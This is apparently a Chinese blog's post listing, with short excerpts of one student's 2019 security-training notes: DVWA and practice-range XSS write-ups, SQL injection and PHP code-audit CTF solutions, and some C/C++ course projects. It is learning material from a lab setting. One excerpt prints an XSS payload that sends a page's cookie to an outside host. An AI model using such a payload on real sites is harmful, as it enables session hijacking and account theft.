DVWA XSS 盗取cookie实战

DVWA XSS 盗取cookie实战 今天把dvwa的XSS的漏洞又给利用了一下,以前都是弹个框就没了,这次要试试盗cookie。这次说一个东西,很基础的东西,但我也是现在才明白,就是关于html编码,绕过过滤的事情。以前总感觉HTML编码绕过滤,这个方法时灵时不灵,直到现在,才发现原来是自己...

2019-07-13 21:12:18

阅读数 13

评论数 4

集训第二周 星期二

XSS的利用 获取cookie 今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。 主要就是围绕这句话展开的 <script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.c...

2019-07-11 17:21:49

阅读数 12

评论数 0

test.xss.tv

集训第二周 星期一(下) 下午接着XSS,先放靶场 http://test.xss.tv/level1.php?name=test level 1 这一题也没什么,主要就是找到注入点,让name等于test23,看下页面源码,发现只有一个地方出现了我们输入得东西。于是我们构造payload...

2019-07-09 16:02:08

阅读数 5

评论数 0

xss.haozi.me

集训第二周 星期一 第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。 先给出XSS靶场的地址: https://xss.haozi.me/#/0x00 我是在谷歌上写的,不知道为什么同样的payloa...

2019-07-09 09:26:05

阅读数 4

评论数 0

集训第三天

集训第三天 集训第三天,由于上午有些事情,没有学习,所以今天可能学习得东西应该会有点少,哈哈。 今天本来打算去学习一下JavaScript,但是我们下个学期学校会讲,于是打算到之后再学, 要不然太浪费时间了,书也白借了。 让后去了解了一下CSRF,感觉它的作用是去让受害者,在登陆某个网站后,...

2019-07-03 18:47:32

阅读数 8

评论数 0

集训第一天

sql注入的复习 今天正式开始集训,不知道会怎么样,希望可以学到一些东西。每天把自己学的东西记录一下吧。今天没学什么,主要是复习前面的东西,比如SQL注入,时间是把杀猪刀,以前学的东西,长时间不用,都忘了。哎,没办法。记了两道实验吧的题,以前也写过,但是没怎么记住。 1.你真的会PHP吗: ...

2019-07-03 18:47:18

阅读数 16

评论数 0

C++课程设计 信息管理系统

半年一个课程设计,本来想做的游戏的,但是没有做出来,老脸一红。这个与 上个学期的课程设计主要亮点是,用了C++的语法,好像是句废话;让后做了个登陆界面;使用了C++的STL标注库;工号不能重复;增加了模糊查询这个功能。下学期,绝对不做这个东西了。太没意思了。本来还想加多线程了,但是不会弄,丢人啊!...

2019-07-01 21:14:24

阅读数 15

评论数 0

ISCC WEB4 变量覆盖漏洞

打开链接,开始审计。 <?php error_reporting(0); include("flag.php"); $hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe748...

2019-05-31 07:51:27

阅读数 12

评论数 0

web1 ISCC

打开连接,又是审计, <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ...

2019-05-31 07:51:11

阅读数 11

评论数 0

C语言 课程设计 信息管理

大一写的课程设计,很一般,但是留个纪念吧,有不懂的可以留言啊! #include<stdio.h> #include<malloc.h> #include<string.h> #include<tim...

2019-05-31 07:49:24

阅读数 54

评论数 0

bugku 速度要快

在源代码里有一个提示,说传递margin参数,但是又不知道传什么,在响应头里有个flag,应该是base64加密的,然后解密后发现好像还可以再解密一次,让后再此解密,所以就把base64解密的数值传过去试试。但是好像它一直在变,让后就要写脚本自动传递,我也不知道为啥。写脚本和一直变又什么联系吗,但...

2019-05-15 21:39:27

阅读数 40

评论数 0

攻防世界 unserialize3

class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。虽然这样说,但我还是不太...

2019-05-14 20:58:09

阅读数 103

评论数 0

小哼买书 啊哈 算法

小哼的学校要建立一个图书角,老师派小哼去找一些同学做调查,看看同学们都喜欢读 哪些书。小哼让每个同学写出一个自己想读的书的 ISBN号(你知道吗?每本书都有唯一 的 ISBN 号,不信的话你去找本书翻到背面看看)。当然有一些好书会有很多同学都喜欢, 这样就会收集到很多重复的 ISBN号。小哼需要去...

2019-05-11 21:24:05

阅读数 21

评论数 0

Jarvis OJ Simple Injection

Jarvis OJ Simple Injection 题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,输入其他的是用户名错误,绕后就想到了实验吧的一道题,“” ...

2019-05-10 20:31:46

阅读数 91

评论数 0

因缺思汀的绕过

因缺思汀的绕过 打开源代码,发现一个提示,又是代码审计。 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form ac...

2019-05-10 19:40:58

阅读数 82

评论数 0

bugku -- 简单的sql注入之3

bugku – 简单的sql注入之3 用 1‘试了试,报错,让后1“回显正常。应该是单引号。既然报错,就试了试updatexml()这个函数,但发现被过滤了,所以用exp()这个函数,这里附上一些常见的报错函数:https://www.cnblogs.com/wocalieshenmegui/p...

2019-05-08 15:31:02

阅读数 39

评论数 0

冒泡排序

冒泡排序 输入几个数,让后从第一个数开始排序,我这里是从大往小排。首先第一个,从所有的数中,从前面开始找,看是否有比它大的,如果有,就调换位置。让后看第二个数,但是这个时候,就不能再从所有的数中找是否有比他大的数了,因为这个时候前面的数可能比它大,但是不能换,所以从它自身开始查找。 #includ...

2019-05-07 22:01:36

阅读数 16

评论数 0

实验吧 登陆一下好吗??

实验吧 登陆一下好吗?? 打开连接,看源代码,抓包,扫面,发现:什么也没有发现。硬着头皮用sql注入,让后第一反应是用or,但是发现被过滤了,用||,发现也被过滤了。没办法,看了别人的博客,发现它的语句可能是: $sql=“select * from uers where username=’$...

2019-05-06 18:03:45

阅读数 28

评论数 0

bugku web8

bugku web8 可算是自己写出来一道代码审计的题,虽然比较简单。 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "&...

2019-05-06 17:37:20

阅读数 49

评论数 0

bugku 各种绕过

bugku 各种绕过 <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxxx}'; if (isset($_GET['uname'...

2019-05-06 17:27:26

阅读数 30

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭